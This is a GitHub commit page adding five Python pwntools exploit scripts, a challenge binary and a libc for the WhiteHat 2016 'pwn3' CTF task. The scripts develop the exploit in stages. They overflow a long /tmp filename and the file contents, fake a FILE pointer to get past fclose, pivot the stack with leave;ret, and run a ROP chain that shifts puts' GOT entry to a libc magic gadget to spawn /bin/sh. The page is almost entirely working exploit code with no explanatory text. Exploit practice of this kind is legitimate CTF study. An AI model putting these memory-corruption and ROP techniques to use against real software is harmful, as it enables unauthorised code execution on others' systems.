Skip to content

Commit 1ee9b8a

Browse files
ctfhackerctfhacker
committed
Merge branch 'master' of github.com:ctfhacker/ctf-writeups
2 parents fe71bab + 0af3b8e commit 1ee9b8a

File tree

7 files changed

+274
-0
lines changed

7 files changed

+274
-0
lines changed

whitehat-2016/pwn3/libc-2.19.so

1.67 MB
Binary file not shown.

whitehat-2016/pwn3/readfile

7.62 KB
Binary file not shown.

whitehat-2016/pwn3/win_1.py

+36
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,36 @@
1+
from pwn import *
2+
import string
3+
4+
context.terminal = ['tmux', 'splitw', '-h']
5+
6+
r = None
7+
8+
def write_file(name, data):
9+
r.sendline('1')
10+
r.sendline(name)
11+
r.sendline(str(len(data)))
12+
r.sendline(data)
13+
14+
def read_file(name):
15+
r.sendline('2')
16+
r.sendline(name)
17+
18+
filename = '/tmp/' + cyclic(240, alphabet=string.ascii_uppercase)
19+
print(filename)
20+
try:
21+
os.remove(filename)
22+
except:
23+
pass
24+
25+
r = process("./readfile")
26+
27+
data = cyclic(1000)
28+
write_file(filename, data)
29+
30+
r = process("./readfile")
31+
gdb.attach(r, '''
32+
c
33+
''')
34+
read_file(filename)
35+
36+
r.interactive()

whitehat-2016/pwn3/win_2.py

+38
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
from pwn import *
2+
import string
3+
4+
# context.terminal = ['tmux', 'splitw', '-h']
5+
6+
r = None
7+
8+
def write_file(name, data):
9+
r.sendline('1')
10+
r.sendline(name)
11+
r.sendline(str(len(data)))
12+
r.sendline(data)
13+
14+
def read_file(name):
15+
r.sendline('2')
16+
r.sendline(name)
17+
18+
filename = '/tmp/' + cyclic(240, alphabet=string.ascii_uppercase)
19+
print(filename)
20+
try:
21+
os.remove(filename)
22+
except:
23+
pass
24+
25+
r = process("./readfile")
26+
27+
data = 'a' * cyclic_find('paac')
28+
data += p32(0x804a0a0)
29+
data += 'b' * (1000 - len(data))
30+
write_file(filename, data)
31+
32+
r = process("./readfile")
33+
gdb.attach(r, '''
34+
c
35+
''')
36+
read_file(filename)
37+
38+
r.interactive()

whitehat-2016/pwn3/win_3.py

+42
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
from pwn import *
2+
import string
3+
4+
# context.terminal = ['tmux', 'splitw', '-h']
5+
6+
r = None
7+
8+
def write_file(name, data):
9+
r.sendline('1')
10+
r.sendline(name)
11+
r.sendline(str(len(data)))
12+
r.sendline(data)
13+
14+
def read_file(name):
15+
r.sendline('2')
16+
r.sendline(name)
17+
18+
data = cyclic(cyclic_find('ARAA', alphabet=string.ascii_uppercase))
19+
data += p32(0x804af00) # 2) Some valid address to pass fclose
20+
data += cyclic(240-len(data), alphabet=string.ascii_uppercase)
21+
filename = '/tmp/' + data
22+
print(filename)
23+
try:
24+
os.remove(filename)
25+
except:
26+
pass
27+
28+
r = process("./readfile")
29+
30+
data = 'a' * cyclic_find('paac')
31+
data += p32(0x804a0a0) # 1) Some valid address to pass fclose
32+
data += 'b' * (1000 - len(data))
33+
write_file(filename, data)
34+
35+
r = process("./readfile")
36+
gdb.attach(r, '''
37+
break *0x0804890a
38+
c
39+
''')
40+
read_file(filename)
41+
42+
r.interactive()

whitehat-2016/pwn3/win_4.py

+56
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
from pwn import *
2+
import string
3+
4+
# context.terminal = ['tmux', 'splitw', '-h']
5+
6+
elf = ELF('readfile')
7+
rop = ROP(elf)
8+
stager = ROP(elf)
9+
10+
r = None
11+
12+
def write_file(name, data):
13+
r.sendline('1')
14+
r.sendline(name)
15+
r.sendline(str(len(data)))
16+
r.sendline(data)
17+
18+
def read_file(name):
19+
r.sendline('2')
20+
r.sendline(name)
21+
22+
leaveret = 0x80486f1
23+
24+
data = p32(leaveret)
25+
26+
data2 = 'c' * cyclic_find('aaca')
27+
data2 += p32(0x04a0f000)
28+
data2 += '\x08' * (cyclic_find('ARAA', alphabet=string.ascii_uppercase) - 4 - len(data2))
29+
data += data2
30+
31+
data += p32(0x804af00) # 2) Some valid address to pass fclose
32+
data += p32(0x804a0a5-0x3c) # 3) Address we will be calling at instruction call [eax + 0x3c]
33+
data += cyclic(240-len(data), alphabet=string.ascii_uppercase)
34+
filename = '/tmp/' + data
35+
print(filename)
36+
try:
37+
os.remove(filename)
38+
except:
39+
pass
40+
41+
r = process("./readfile")
42+
43+
data = 'a' * cyclic_find('paac')
44+
data += p32(0x804a0a0) # 1) Some valid address to pass fclose
45+
data += 'b' * (1000 - len(data))
46+
write_file(filename, data)
47+
48+
r = process("./readfile")
49+
gdb.attach(r, '''
50+
break *{}
51+
break *0x0804890a
52+
c
53+
'''.format(hex(leaveret)))
54+
read_file(filename)
55+
56+
r.interactive()

whitehat-2016/pwn3/win_5.py

+102
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,102 @@
1+
from pwn import *
2+
import string
3+
4+
context.terminal = ['tmux', 'splitw', '-h']
5+
6+
elf = ELF('readfile')
7+
rop = ROP(elf)
8+
stager = ROP(elf)
9+
10+
r = None
11+
12+
def write_file(name, data):
13+
r.sendline('1')
14+
r.sendline(name)
15+
r.sendline(str(len(data)))
16+
r.sendline(data)
17+
18+
def read_file(name):
19+
r.sendline('2')
20+
r.sendline(name)
21+
22+
"""
23+
1:
24+
0x080486af : mov eax, dword ptr [0x804a088] ; cmp eax, ebx ; jb 0x80486ba ; mov byte ptr [0x804a084], 1 ; add esp, 4 ; pop ebx ; pop ebp ; ret
25+
2:
26+
0x080486be : add dword ptr [ebx + 0x5d5b04c4], eax ; ret
27+
"""
28+
29+
ret = 0x08048a29
30+
binsh = 0x804af00
31+
32+
stager.gets(0x804a300) # Arbitrary address somewhere deeper in the 0x804a000 chunk
33+
stager.migrate(0x804a300) # Stack pivot to 0x804a300
34+
print(stager.dump())
35+
36+
rop.gets(0x804a088) # Put constant value
37+
rop.raw(0x80486af)
38+
rop.raw(0xaaaaaaaa) # junk
39+
rop.raw(elf.got['puts']-0x5d5b04c4) # puts-magic libc
40+
rop.raw(0x804a900) # junk
41+
rop.raw(0x80486be) # Add constant to puts
42+
rop.gets(binsh) # Put /bin/sh in memory
43+
rop.gets(0x804a088) # Put pointer to /bin/sh in memory
44+
rop.raw(0x80486af) # Put pointer to /bin/sh in eax
45+
rop.raw(0x804a900) # junk
46+
rop.raw(0x804a900) # junk ebx
47+
rop.raw(0x804a900) # junk ebp
48+
rop.puts(0) # Trigger magic libc
49+
50+
leaveret = 0x80486f1
51+
52+
data = p32(leaveret)
53+
54+
data2 = 'c' * cyclic_find('aaca')
55+
data2 += p32(0x04a18000)
56+
data2 += '\x08' * (cyclic_find('ARAA', alphabet=string.ascii_uppercase) - 4 - len(data2))
57+
data += data2
58+
59+
data += p32(0x804af00) # 2) Some valid address to pass fclose
60+
data += p32(0x804a0a5-0x3c) # 3) Address we will be calling at instruction call [eax + 0x3c]
61+
data += p32(0xcafebabe) # junk data
62+
# data += str(stager) # TRIGGER FOR ROP CHAIN
63+
# data += p32(ret) * ((240-len(data)-len(str(stager)))/4) # ROP nops
64+
data += p32(0xdeadbeef) * 36
65+
data += str(stager)
66+
67+
filename = '/tmp/' + data
68+
print(filename)
69+
try:
70+
os.remove(filename)
71+
except:
72+
pass
73+
74+
r = process("./readfile")
75+
76+
data = 'a' * cyclic_find('paac')
77+
data += p32(0x804a0a0) # 1) Some valid address to pass fclose
78+
data += 'b' * (1000 - len(data))
79+
write_file(filename, data)
80+
81+
r = process("./readfile")
82+
"""
83+
gdb.attach(r, '''
84+
break *{}
85+
break *0x0804890a
86+
break gets
87+
break *0x80486be
88+
c
89+
'''.format(hex(leaveret)))
90+
"""
91+
read_file(filename)
92+
93+
raw_input("Send second rop chain")
94+
r.sendline(str(rop)) # Constant value to add to puts
95+
raw_input("Send constant value")
96+
r.sendline(p32(0xfffdaa19)) # Constant value to add to puts
97+
raw_input("Send /bin/sh")
98+
r.sendline("/bin/sh\0") # Constant value to add to puts
99+
raw_input("Send pointer to /bin/sh")
100+
r.sendline(p32(binsh)) # Constant value to add to puts
101+
102+
r.interactive()

0 commit comments

Comments
 (0)